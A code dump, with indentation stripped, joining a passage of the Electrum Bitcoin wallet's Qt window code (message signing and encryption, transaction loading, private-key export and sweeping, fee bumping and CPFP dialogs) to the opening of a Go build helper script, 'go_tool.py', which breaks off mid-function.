b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(
tx=tx,
txid=txid,
new_fee_rate=new_fee_rate,
coins=self.get_coins(),
)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
go_tool.py | import argparse
import copy
import json
import os
import shutil
import subprocess
import sys
import tempfile
import threading
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
def compare_versions(version1, version2):
v1 = tuple(str(int(x)).zfill(8) for x in version1.split('.'))
v2 = tuple(str(int(x)).zfill(8) for x in version2.split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# print >>sys.stderr, ' '.join(cmd)
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = list(filter(lambda x: x.endswith('.go'), srcs))
args.asm_srcs = list(filter(lambda x: x.endswith('.s'), srcs))
args.objects = list(filter(lambda x: x.endswith('.o') or x.endswith('.obj'), srcs))
args.symabis = list(filter(lambda x: x.endswith('.symabis'), srcs))
args.sysos = list(filter(lambda x: x.endswith('.syso'), srcs))
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in import_map.items():
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in module_map.items():
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# print >>sys.stderr, content
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
def vet_info_output_name(path):
return path + '.vet.out'
def vet_report_output_name(path):
return path + '.vet.txt'
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
# does't make any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.arc_source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': list(filter(lambda x: x.endswith('.go'), args.go_srcs)),
'NonGoFiles': list(filter(lambda x: not x.endswith('.go'), args.go_srcs)),
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# print >>sys.stderr, json.dumps(data, indent=4)
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in full_diags.iteritems():
for _, type_diags in module_diags.iteritems():
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.arc_source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), filter(None, test_args_list), ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.build_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [args.go_compile, '-o', args.output, '-trimpath', args.arc_source_root, '-p', import_path, '-D', '""']
cmd += ['-goversion', 'go' + args.goversion]
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
if compare_versions('1.12', args.goversion) >= 0:
if args.symabis:
cmd += ['-symabis'] + args.symabis
if compare_versions('1.13', args.goversion) >= 0:
pass
elif import_path in ('runtime', 'runtime/internal/atomic'):
cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
cmd += args.compile_flags
if '-race' in args.compile_flags:
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
